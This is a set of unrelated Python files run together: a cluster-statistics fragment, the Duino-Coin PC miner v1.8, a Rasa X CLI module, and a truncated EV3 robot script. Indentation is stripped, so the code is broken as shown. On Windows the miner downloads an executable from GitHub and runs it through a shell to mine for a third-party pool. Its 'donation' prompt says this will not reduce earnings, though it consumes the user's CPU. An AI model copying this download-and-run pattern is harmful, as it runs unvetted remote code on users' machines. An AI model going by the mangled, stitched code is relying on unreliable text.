if ip not in recentMesosNodes:
logger.debug("Worker node at %s is not reporting executor information")
# we don't have up to date information about the node
info = _getInfo(allMesosNodes, ip)
else:
# mesos knows about the ip & we have up to date information - easy!
info = recentMesosNodes[ip]
# add info to dict to return
nodeToInfo[node] = info
return nodeToInfo
def shutDown(self, preemptable):
if self.stats:
self.stats.shutDownStats()
logger.debug('Forcing provisioner to reduce cluster size to zero.')
totalNodes = self.setNodeCount(numNodes=0, preemptable=preemptable, force=True)
if totalNodes > len(self.scaler.provisioner.getStaticNodes(preemptable)): # ignore static nodes
            raise RuntimeError('Provisioner could not terminate all autoscaled nodes. There are '
                               '%s nodes left in the cluster, %s of which were statically provisioned'
                               % (totalNodes, len(self.scaler.provisioner.getStaticNodes(preemptable)))
                               )
elif totalNodes < len(self.scaler.provisioner.getStaticNodes(preemptable)): # ignore static nodes
raise RuntimeError('Provisioner incorrectly terminated statically provisioned nodes.')
class ClusterStats(object):
def __init__(self, path, batchSystem, clusterName):
logger.debug("Initializing cluster statistics")
self.stats = {}
self.statsThreads = []
self.statsPath = path
self.stop = False
self.clusterName = clusterName
self.batchSystem = batchSystem
self.scaleable = isinstance(self.batchSystem, AbstractScalableBatchSystem) if batchSystem else False
def shutDownStats(self):
if self.stop:
return
def getFileName():
extension = '.json'
file = '%s-stats' % self.clusterName
counter = 0
while True:
suffix = str(counter).zfill(3) + extension
fullName = os.path.join(self.statsPath, file + suffix)
if not os.path.exists(fullName):
return fullName
counter += 1
if self.statsPath and self.scaleable:
self.stop = True
for thread in self.statsThreads:
thread.join()
fileName = getFileName()
with open(fileName, 'w') as f:
json.dump(self.stats, f)
def startStats(self, preemptable):
thread = ExceptionalThread(target=self._gatherStats, args=[preemptable])
thread.start()
self.statsThreads.append(thread)
def checkStats(self):
for thread in self.statsThreads:
# propagate any errors raised in the threads execution
thread.join(timeout=0)
def _gatherStats(self, preemptable):
def toDict(nodeInfo):
# convert NodeInfo object to dict to improve JSON output
return dict(memory=nodeInfo.memoryUsed,
cores=nodeInfo.coresUsed,
memoryTotal=nodeInfo.memoryTotal,
coresTotal=nodeInfo.coresTotal,
requestedCores=nodeInfo.requestedCores,
requestedMemory=nodeInfo.requestedMemory,
workers=nodeInfo.workers,
time=time.time() # add time stamp
)
if self.scaleable:
logger.debug("Staring to gather statistics")
stats = {}
try:
while not self.stop:
nodeInfo = self.batchSystem.getNodes(preemptable)
for nodeIP in nodeInfo.keys():
nodeStats = nodeInfo[nodeIP]
if nodeStats is not None:
nodeStats = toDict(nodeStats)
try:
                                # if the node is already registered, append the newly
                                # reported stats to its history
stats[nodeIP].append(nodeStats)
except KeyError:
# create a new entry for the node
stats[nodeIP] = [nodeStats]
time.sleep(60)
finally:
threadName = 'Preemptable' if preemptable else 'Non-preemptable'
logger.debug('%s provisioner stats thread shut down successfully.', threadName)
self.stats[threadName] = stats
else:
pass

PC_Miner.py

#!/usr/bin/env python3
##########################################
# Duino-Coin Python Miner (v1.8)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2020
##########################################
import socket, statistics, threading, time, re, subprocess, hashlib, platform, getpass, configparser, sys, datetime, os # Import libraries
from pathlib import Path
from signal import signal, SIGINT
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
try: # Check if cpuinfo is installed
import cpuinfo
from multiprocessing import freeze_support
except:
now = datetime.datetime.now()
print(now.strftime("%H:%M:%S ") + "Cpuinfo is not installed. Miner will try to install it. If it fails, please install it using: python3 -m pip install py-cpuinfo.\nIf you can't install it, use Minimal-PC_Miner.")
install("py-cpuinfo")
os.execl(sys.executable, sys.executable, *sys.argv)
try: # Check if colorama is installed
from colorama import init, Fore, Back, Style
except:
now = datetime.datetime.now()
print(now.strftime("%H:%M:%S ") + "Colorama is not installed. Miner will try to install it. If it fails, please install it using: python3 -m pip install colorama.\nIf you can't install it, use Minimal-PC_Miner.")
install("colorama")
os.execl(sys.executable, sys.executable, *sys.argv)
try: # Check if requests is installed
import requests
except:
now = datetime.datetime.now()
print(now.strftime("%H:%M:%S ") + "Requests is not installed. Miner will try to install it. If it fails, please install it using: python3 -m pip install requests.\nIf you can't install it, use Minimal-PC_Miner.")
install("requests")
os.execl(sys.executable, sys.executable, *sys.argv)
# Global variables
minerVersion = "1.8" # Version number
timeout = 5 # Socket timeout
resources = "PCMiner_"+str(minerVersion)+"_resources"
shares = [0, 0]
diff = 0
last_hash_count = 0
khash_count = 0
hash_count = 0
hash_mean = []
donatorrunning = False
debug = False
serveripfile = "https://raw.githubusercontent.com/revoxhere/duino-coin/gh-pages/serverip.txt" # Serverip file
config = configparser.ConfigParser()
autorestart = 0
donationlevel = 0
platform = str(platform.system()) + " " + str(platform.release()) # Platform information
freeze_support() # If not used, pyinstaller hangs when checking cpuinfo
cpu = cpuinfo.get_cpu_info() # Processor info
try:
os.mkdir(str(resources)) # Create resources folder if it doesn't exist
except:
pass
def debugOutput(text):
if debug == "True":
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
if os.name == 'nt':
os.system("title "+title)
else:
print('\33]0;'+title+'\a', end='')
sys.stdout.flush()
def handler(signal_received, frame): # If CTRL+C or SIGINT received, send CLOSE request to server in order to exit gracefully.
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "\n%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " SIGINT detected - Exiting gracefully." + Style.NORMAL + Fore.WHITE + " See you soon!")
try:
soc.send(bytes("CLOSE", encoding="utf8")) # Try sending a close connection request to the server
except:
if debug == "True": raise
os._exit(0)
signal(SIGINT, handler) # Enable signal handler
def Greeting(): # Greeting message depending on time
global autorestart, greeting
print(Style.RESET_ALL)
if float(autorestart) <= 0:
autorestart = 0
autorestartmessage = "disabled"
if float(autorestart) > 0:
autorestartmessage = "every " + str(autorestart) + " minutes"
current_hour = time.strptime(time.ctime(time.time())).tm_hour
if current_hour < 12 :
greeting = "Have a wonderful morning"
elif current_hour == 12 :
greeting = "Have a tasty noon"
elif current_hour > 12 and current_hour < 18 :
greeting = "Have a peaceful afternoon"
elif current_hour >= 18 :
greeting = "Have a cozy evening"
else:
greeting = "Welcome back"
print(" > " + Fore.YELLOW + Style.BRIGHT + "Official Duino-Coin © Python Miner " + Style.RESET_ALL + Fore.WHITE + "(v" + str(minerVersion) + ") 2019-2020") # Startup message
print(" > " + Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
try:
print(" > " + Fore.WHITE + "CPU: " + Style.BRIGHT + Fore.YELLOW + str(cpu["brand_raw"]))
except:
if debug == "True": raise
if os.name == 'nt':
print(" > " + Fore.WHITE + "Donation level: " + Style.BRIGHT + Fore.YELLOW + str(donationlevel))
print(" > " + Fore.WHITE + "Algorithm: " + Style.BRIGHT + Fore.YELLOW + "DUCO-S1")
print(" > " + Fore.WHITE + "Autorestarter: " + Style.BRIGHT + Fore.YELLOW + str(autorestartmessage))
print(" > " + Fore.WHITE + str(greeting) + ", " + Style.BRIGHT + Fore.YELLOW + str(username) + "!\n")
if os.name == 'nt':
if not Path(str(resources) + "/Donate_executable.exe").is_file(): # Initial miner executable section
debugOutput("OS is Windows, downloading developer donation executable")
url = 'https://github.com/revoxhere/duino-coin/blob/useful-tools/PoT_auto.exe?raw=true'
r = requests.get(url)
with open(str(resources) + '/Donate_executable.exe', 'wb') as f:
f.write(r.content)
def hashrateCalculator(): # Hashes/sec calculation
global last_hash_count, hash_count, khash_count, hash_mean
last_hash_count = hash_count
khash_count = last_hash_count / 1000
hash_mean.append(khash_count) # Calculate average hashrate
khash_count = statistics.mean(hash_mean)
khash_count = round(khash_count, 2)
hash_count = 0 # Reset counter
threading.Timer(1.0, hashrateCalculator).start() # Run this def every 1s
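# Note on units: hash_count is incremented once per attempted SHA-1 in Mine() below, so
# khash_count holds a running mean of kilo-hashes per second over the whole session; when a
# result is submitted to the pool it is multiplied back by 1000 to report hashes per second.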
def autorestarter(): # Autorestarter
time.sleep(float(autorestart)*60)
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Restarting the miner")
os.execl(sys.executable, sys.executable, *sys.argv)
def loadConfig(): # Config loading section
global username, efficiency, autorestart, donationlevel, debug
if not Path(str(resources) + "/Miner_config.cfg").is_file(): # Initial configuration section
print(Style.BRIGHT + "\nDuino-Coin basic configuration tool\nEdit "+str(resources) + "/Miner_config.cfg file later if you want to change it.")
print(Style.RESET_ALL + "Don't have an Duino-Coin account yet? Use " + Fore.YELLOW + "Wallet" + Fore.WHITE + " to register on server.\n")
username = input(Style.RESET_ALL + Fore.YELLOW + "Enter your username: " + Style.BRIGHT)
efficiency = input(Style.RESET_ALL + Fore.YELLOW + "Set mining intensity (1-100)% (recommended: 100): " + Style.BRIGHT)
autorestart = input(Style.RESET_ALL + Fore.YELLOW + "If you want, set after how many minutes miner will restart (recommended: 30): " + Style.BRIGHT)
donationlevel = "0"
if os.name == 'nt':
donationlevel = input(Style.RESET_ALL + Fore.YELLOW + "Set developer donation level (0-5) (recommended: 1), this will not reduce your earnings: " + Style.BRIGHT)
efficiency = re.sub("\D", "", efficiency) # Check wheter efficiency is correct
if float(efficiency) > int(100):
efficiency = 100
if float(efficiency) < int(1):
efficiency = 1
donationlevel = re.sub("\D", "", donationlevel) # Check wheter donationlevel is correct
if float(donationlevel) > int(5):
donationlevel = 5
if float(donationlevel) < int(0):
donationlevel = 0
config['miner'] = { # Format data
"username": username,
"efficiency": efficiency,
"autorestart": autorestart,
"donate": donationlevel,
"debug": False}
with open(str(resources) + "/Miner_config.cfg", "w") as configfile: # Write data to file
config.write(configfile)
        efficiency = (100 - float(efficiency)) * 0.01 # Calculate efficiency for use with sleep function
print(Style.RESET_ALL + "Config saved! Launching...\n")
else: # If config already exists, load from it
config.read(str(resources) + "/Miner_config.cfg")
username = config["miner"]["username"]
efficiency = config["miner"]["efficiency"]
        efficiency = (100 - float(efficiency)) * 0.01 # Calculate efficiency for use with sleep function
autorestart = config["miner"]["autorestart"]
donationlevel = config["miner"]["donate"]
debug = config["miner"]["debug"]
def Connect(): # Connect to pool section
global soc, pool_address, pool_port
res = requests.get(serveripfile, data = None) #Use request to grab data from raw github file
if res.status_code == 200: #Check for response
content = res.content.decode().splitlines() #Read content and split into lines
pool_address = content[0] #Line 1 = pool address
pool_port = content[1] #Line 2 = pool port
debugOutput("Retrieved pool IP: " + pool_address + ":" + str(pool_port))
try: # Shutdown previous connections if any
soc.shutdown(socket.SHUT_RDWR)
soc.close()
except:
debugOutput("No previous connections to close")
try: # Try to connect
soc = socket.socket()
soc.connect((str(pool_address), int(pool_port)))
soc.settimeout(timeout)
except: # If it wasn't, display a message
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Connection error! Retrying in 15s.")
if debug == "True": raise
time.sleep(15)
Connect()
def checkVersion():
serverVersion = soc.recv(1024).decode() # Check server version
debugOutput("Server version: " + serverVersion)
if float(serverVersion) <= float(minerVersion) and len(serverVersion) == 3: # If miner is up-to-date, display a message and continue
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.YELLOW + " Connected" + Style.RESET_ALL + Fore.WHITE + " to master Duino-Coin server (v"+str(serverVersion)+")")
else:
now = datetime.datetime.now()
cont = input(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Miner is outdated (v"+minerVersion+")," + Style.RESET_ALL + Fore.RED + " server is on v"+serverVersion+", please download latest version from https://github.com/revoxhere/duino-coin/releases/ or type \'continue\' if you wish to continue anyway.\n")
if cont != "continue":
os._exit(1)
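# Illustrative condensation of the DUCO-S1 search performed inside Mine() below: the pool
# sends a job as (last block hash, expected hash, difficulty) and the miner brute-forces a
# nonce in [0, 100*difficulty] such that sha1(last block hash + str(nonce)) equals the
# expected hash. This helper is a readability sketch only; the miner itself does not call it.
def ducos1_solve(last_block_hash, expected_hash, difficulty):
    for nonce in range(100 * int(difficulty) + 1):
        if hashlib.sha1((last_block_hash + str(nonce)).encode("utf-8")).hexdigest() == expected_hash:
            return nonce
    return None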
def Mine(): # Mining section
global last_hash_count, hash_count, khash_count, donationlevel, donatorrunning, efficiency
if os.name == 'nt' and donatorrunning == False:
cmd = str(resources) + "/Donate_executable.exe -o stratum+tcp://xmg.minerclaim.net:3333 -o revox.donate -p x -e "
if int(donationlevel) == 5: cmd += "100"
elif int(donationlevel) == 4: cmd += "75"
elif int(donationlevel) == 3: cmd += "50"
elif int(donationlevel) == 2: cmd += "25"
elif int(donationlevel) == 1: cmd += "10"
if int(donationlevel) > 0: # Launch CMD as subprocess
debugOutput("Starting donation process")
donatorrunning = True
subprocess.Popen(cmd, shell=True, stderr=subprocess.DEVNULL)
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Thank You for being an awesome donator! <3")
else:
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Duino-Coin network is a completely free service and will always be." + Style.BRIGHT + Fore.YELLOW + "\n You can help us maintain the server and low-fee payouts by donating.\n Visit " + Style.RESET_ALL + Fore.GREEN + "https://duinocoin.com/donate" + Style.BRIGHT + Fore.YELLOW + " to learn more.")
now = datetime.datetime.now()
    print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Mining thread is starting" + Style.RESET_ALL + Fore.WHITE + " using DUCO-S1 algorithm with " + Fore.YELLOW + str(int(100 - (100 * float(efficiency)))) + "% efficiency")
while True:
if float(efficiency) < 100: time.sleep(float(efficiency)) # Sleep to achieve lower efficiency if less than 100 selected
while True:
soc.send(bytes(f"JOB,{str(username)}", encoding="utf8")) # Send job request
job = soc.recv(1024).decode() # Get work from pool
job = job.split(",") # Split received data to job and difficulty
diff = job[2]
if job[0] and job[1] and job[2]:
debugOutput("Job received: " +str(job))
break # If job received, continue to hashing algo
computestart = datetime.datetime.now()
        for ducos1res in range(100 * int(diff) + 1): # Loop from 0 to 100*diff
ducos1 = hashlib.sha1(str(job[0] + str(ducos1res)).encode("utf-8")).hexdigest() # Generate hash
hash_count = hash_count + 1 # Increment hash counter
            if job[1] == ducos1: # If the hash matches the expected hash, send the result
debugOutput("Result found: " + str(ducos1res))
computestop = datetime.datetime.now()
while True:
try:
soc.send(bytes(f"{str(ducos1res)},{str(khash_count*1000)},Official Python Miner v{str(minerVersion)}", encoding="utf8")) # Send result of hashing algorithm to pool
feedback = soc.recv(1024).decode() # Get feedback
debugOutput("Feedback received: " + str(feedback))
except socket.timeout:
pass
now = datetime.datetime.now()
computetime = now - computestart # Time from start of hash computing to finding the result
computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
if feedback == "GOOD": # If result was good
shares[0] += 1 # Share accepted = increment feedback shares counter by 1
title("Duino-Coin Python Miner (v"+str(minerVersion)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Accepted " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
elif feedback == "BLOCK": # If big block was found
shares[0] += 1 # Share accepted = increment feedback shares counter by 1
title("Duino-Coin Python Miner (v"+str(minerVersion)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Block accepted ("+str(job[0])[:8]+") " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
elif feedback == "INVU": # If this user doesn't exist server will forward earnings to developer account
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " User "+str(username)+" doesn't exist." + Style.RESET_ALL + Fore.RED + " Make sure you've entered the username correctly. Please check your config file. Exiting in 15s.")
time.sleep(15)
os._exit(1)
elif feedback == "ERR": # If this user doesn't exist server will forward earnings to developer account
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Internal server error." + Style.RESET_ALL + Fore.RED + " Retrying in 15s.")
time.sleep(15)
Connect()
else: # If result was bad
shares[1] += 1 # Share rejected = increment bad shares counter by 1
title("Duino-Coin Python Miner (v"+str(minerVersion)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.RED + " Rejected " + Fore.YELLOW + str(shares[1]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.RED + "(boo!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
break # Repeat
if __name__ == '__main__':
init(autoreset=True) # Enable colorama
hashrateCalculator() # Start hashrate calculator
title("Duino-Coin Python Miner (v"+str(minerVersion)+")")
try:
loadConfig() # Load configfile
debugOutput("Config file loaded")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error loading the configfile (Miner_config.cfg). Try removing it and re-running configuration. Exiting in 15s." + Style.RESET_ALL)
if debug == "True": raise
time.sleep(15)
os._exit(1)
try:
Greeting() # Display greeting message
debugOutput("Greeting displayed")
except:
if debug == "True": raise
while True:
try: # Setup autorestarter
if float(autorestart) > 0:
debugOutput("Enabled autorestarter for " + str(autorestart) + " minutes")
threading.Thread(target=autorestarter).start()
else:
debugOutput("Autorestarted is disabled")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error in autorestarter. Check configuration file (Miner_config.cfg). Exiting in 15s." + Style.RESET_ALL)
if debug == "True": raise
time.sleep(15)
os._exit(1)
try:
Connect() # Connect to pool
debugOutput("Connected to master server")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error connecting to the server. Retrying in 15s." + Style.RESET_ALL)
if debug == "True": raise
time.sleep(15)
Connect()
try:
checkVersion() # Check version
debugOutput("Version check complete")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error checking server version. Restarting." + Style.RESET_ALL)
if debug == "True": raise
Connect()
try:
debugOutput("Mining started")
Mine() # Launch mining thread
debugOutput("Mining ended")
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error while mining. Restarting." + Style.RESET_ALL)
#if debug == "True": raise
raise
Connect()
time.sleep(0.025) # Restart
debugOutput("Restarting")

x.py

import argparse
import importlib.util
import logging
import signal
import sys
import os
import traceback
from multiprocessing import get_context
from typing import List, Text, Optional
import ruamel.yaml as yaml
from rasa.cli.utils import get_validated_path, print_warning, print_error
from rasa.cli.arguments import x as arguments
from rasa.constants import (
DEFAULT_ENDPOINTS_PATH,
DEFAULT_CREDENTIALS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_CONFIG_PATH,
DEFAULT_LOG_LEVEL_RASA_X,
)
import rasa.utils.io as io_utils
logger = logging.getLogger(__name__)
DEFAULT_RASA_X_HOST = "http://localhost:5002"
DEFAULT_TRACKER_DB = "tracker.db"
# noinspection PyProtectedMember
def add_subparser(
subparsers: argparse._SubParsersAction, parents: List[argparse.ArgumentParser]
):
x_parser_args = {
"parents": parents,
"conflict_handler": "resolve",
"formatter_class": argparse.ArgumentDefaultsHelpFormatter,
}
if is_rasa_x_installed():
# we'll only show the help msg for the command if Rasa X is actually installed
x_parser_args["help"] = "Starts the Rasa X interface."
shell_parser = subparsers.add_parser("x", **x_parser_args)
shell_parser.set_defaults(func=rasa_x)
arguments.set_x_arguments(shell_parser)
def _rasa_service(
args: argparse.Namespace, endpoints: "AvailableEndpoints", rasa_x_url=None
):
"""Starts the Rasa application."""
from rasa.core.run import serve_application
from rasa.nlu.utils import configure_colored_logging
configure_colored_logging(args.loglevel)
logging.getLogger("apscheduler.executors.default").setLevel(logging.WARNING)
credentials_path = _prepare_credentials_for_rasa_x(
args.credentials, rasa_x_url=rasa_x_url
)
serve_application(
endpoints=endpoints,
port=args.port,
credentials=credentials_path,
cors=args.cors,
auth_token=args.auth_token,
enable_api=True,
jwt_secret=args.jwt_secret,
jwt_method=args.jwt_method,
)
def _prepare_credentials_for_rasa_x(
credentials_path: Optional[Text], rasa_x_url=None
) -> Text:
credentials_path = get_validated_path(
credentials_path, "credentials", DEFAULT_CREDENTIALS_PATH, True
)
if credentials_path:
credentials = io_utils.read_yaml_file(credentials_path)
else:
credentials = {}
    # this makes sure Rasa X is properly configured no matter what
if rasa_x_url:
credentials["rasa"] = {"url": rasa_x_url}
dumped_credentials = yaml.dump(credentials, default_flow_style=False)
tmp_credentials = io_utils.create_temporary_file(dumped_credentials, "yml")
return tmp_credentials
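# For illustration: with rasa_x_url="http://localhost:5002/api" and no credentials file on
# disk, the temporary YAML written above would contain just
#
#   rasa:
#     url: http://localhost:5002/api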
def _overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url):
from rasa.utils.endpoints import EndpointConfig
endpoints.model = EndpointConfig(
"{}/projects/default/models/tags/production".format(rasa_x_url),
token=rasa_x_token,
wait_time_between_pulls=2,
)
if not endpoints.tracker_store:
endpoints.tracker_store = EndpointConfig(type="sql", db=DEFAULT_TRACKER_DB)
def start_rasa_for_local_rasa_x(args: argparse.Namespace, rasa_x_token: Text):
"""Starts the Rasa X API with Rasa as a background process."""
from rasa.core.utils import AvailableEndpoints
args.endpoints = get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
endpoints = AvailableEndpoints.read_endpoints(args.endpoints)
rasa_x_url = "{}/api".format(DEFAULT_RASA_X_HOST)
_overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url)
vars(args).update(
dict(
nlu_model=None,
cors="*",
auth_token=args.auth_token,
enable_api=True,
endpoints=endpoints,
)
)
ctx = get_context("spawn")
p = ctx.Process(target=_rasa_service, args=(args, endpoints, rasa_x_url))
p.daemon = True
p.start()
return p
def is_rasa_x_installed():
"""Check if Rasa X is installed."""
# we could also do something like checking if `import rasax` works,
# the issue with that is that it actually does import the package and this
# takes some time that we don't want to spend when booting the CLI
return importlib.util.find_spec("rasax") is not None
def generate_rasa_x_token(length=16):
"""Generate a hexadecimal secret token used to access the Rasa X API.
A new token is generated on every `rasa x` command.
"""
from secrets import token_hex
return token_hex(length)
def _configure_logging(args):
from rasa.core.utils import configure_file_logging
from rasa.utils.common import set_log_level
log_level = args.loglevel or DEFAULT_LOG_LEVEL_RASA_X
if isinstance(log_level, str):
log_level = logging.getLevelName(log_level)
set_log_level(log_level)
configure_file_logging(log_level, args.log_file)
logging.basicConfig(level=log_level)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
logging.getLogger("engineio").setLevel(logging.WARNING)
logging.getLogger("pika").setLevel(logging.WARNING)
logging.getLogger("socketio").setLevel(logging.ERROR)
if not log_level == logging.DEBUG:
logging.getLogger().setLevel(logging.WARNING)
logging.getLogger("py.warnings").setLevel(logging.ERROR)
def is_rasa_project_setup(project_path: Text):
mandatory_files = [DEFAULT_CONFIG_PATH, DEFAULT_DOMAIN_PATH]
for f in mandatory_files:
if not os.path.exists(os.path.join(project_path, f)):
return False
return True
def rasa_x(args: argparse.Namespace):
from rasa.cli.utils import print_success, print_error, signal_handler
from rasa.core.utils import AvailableEndpoints
signal.signal(signal.SIGINT, signal_handler)
_configure_logging(args)
if args.production:
print_success("Starting Rasa X in production mode... 🚀")
args.endpoints = get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
endpoints = AvailableEndpoints.read_endpoints(args.endpoints)
_rasa_service(args, endpoints)
else:
if not is_rasa_x_installed():
print_error(
"Rasa X is not installed. The `rasa x` "
"command requires an installation of Rasa X."
)
sys.exit(1)
project_path = "."
if not is_rasa_project_setup(project_path):
print_error(
"This directory is not a valid Rasa project. Use 'rasa init' "
"to create a new Rasa project or switch to a valid Rasa project "
"directory."
)
sys.exit(1)
_validate_domain(os.path.join(project_path, DEFAULT_DOMAIN_PATH))
if args.data and not os.path.exists(args.data):
print_warning(
"The provided data path ('{}') does not exists. Rasa X will start "
"without any training data.".format(args.data)
)
# noinspection PyUnresolvedReferences
from rasax.community import local
local.check_license_and_metrics(args)
rasa_x_token = generate_rasa_x_token()
process = start_rasa_for_local_rasa_x(args, rasa_x_token=rasa_x_token)
try:
local.main(args, project_path, args.data, token=rasa_x_token)
except Exception:
print(traceback.format_exc())
print_error(
"Sorry, something went wrong (see error above). Make sure to start "
"Rasa X with valid data and valid domain and config files. Please, "
"also check any warnings that popped up.\nIf you need help fixing "
"the issue visit our forum: https://forum.rasa.com/."
)
finally:
process.terminate()
def _validate_domain(domain_path: Text):
from rasa.core.domain import Domain, InvalidDomain
try:
Domain.load(domain_path)
except InvalidDomain as e:
print_error("The provided domain file could not be loaded. Error: {}".format(e))
sys.exit(1)
|
Main.py
|
#!/usr/bin/env python3
print("Inicializando...", end=' \r')
import time
# from ev3dev.ev3 import *
print("ev3dev.ev3", end=' \r')
from ev3dev2.motor import OUTPUT_A, OUTPUT_B,OUTPUT_C, MoveTank,MoveSteering, SpeedPercent, LargeMotor
print("motores importados", end=' \r')
from ev3dev2.sensor.lego import ColorSensor,UltrasonicSensor
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4  # INPUT_1 is needed for Sensor_Tras below
print("Sensores importados", end=' \r')
from threading import Thread
from math import sqrt
import pickle
print("threading, math e pickle importados", end=' \r')
time.sleep(1)
print("Importacoes concluidas!", end=' \r')
# GLOBAL VARIABLE DECLARATIONS
rodas=MoveTank(OUTPUT_A,OUTPUT_B)
curva=MoveSteering(OUTPUT_A,OUTPUT_B)
Mochila=LargeMotor(OUTPUT_C)
quads = []
orientacao = 0
# memoria_cor= {}
memoria_cor = {}
plaza=False
cor_atual=""
tentativa=0
c=""
mochila=False
velocidade=15
velocidadeFrente=30
cores = pickle.load(open("Cores.p", "rb"))
Sensor_direita = ColorSensor(INPUT_2)
Sensor_esquerda = ColorSensor(INPUT_4)
Sensor_Tras = ColorSensor(INPUT_1)
Sensor_direita.mode = Sensor_direita.MODE_RGB_RAW
Sensor_esquerda.mode = Sensor_esquerda.MODE_RGB_RAW
Sensor_Tras.mode = Sensor_Tras.MODE_RGB_RAW
Sensor_sonic = UltrasonicSensor(INPUT_3)
Sensor_sonic.mode=Sensor_sonic.MODE_US_DIST_CM
print("Declarando tudo!", end=' \r')
# LOCOMOTION FUNCTIONS
def naocaiaRe():
global d
atualD = d[0]+d[1]+d[2]
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
if atualE< 40:
rodas.on(-SpeedPercent(velocidade-5), -SpeedPercent(velocidade))
if atualD<40:
rodas.on(-SpeedPercent(velocidade), -SpeedPercent(velocidade-5))
def retorno():  # function for returning to the last reference point
global tentativa,c,cor_atual,velocidade
while c!=cor_atual:
naocaiaRe()
rodas.on(SpeedPercent(velocidade),SpeedPercent(velocidade))
if c!= 'White': Confirmar_cor(c)
# timing for the stop in the middle of the square
rodas.on_for_seconds(SpeedPercent(velocidade), SpeedPercent(velocidade), 8/SpeedPercent(velocidade))
# 8 is the time factor for it to drive back to the middle of the square; increasing it makes it go further back
rodas.off()
tentativa+=1  # marks that a failed attempt was made
procurar_proximo()  # turns according to the orientations that are still possible
alinha(0.01,245,15)  # moves a little forward so the robot does not recognize the same reference point as a new one
def naocaia_alinhar():
global d
atualD = d[0]+d[1]+d[2]
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
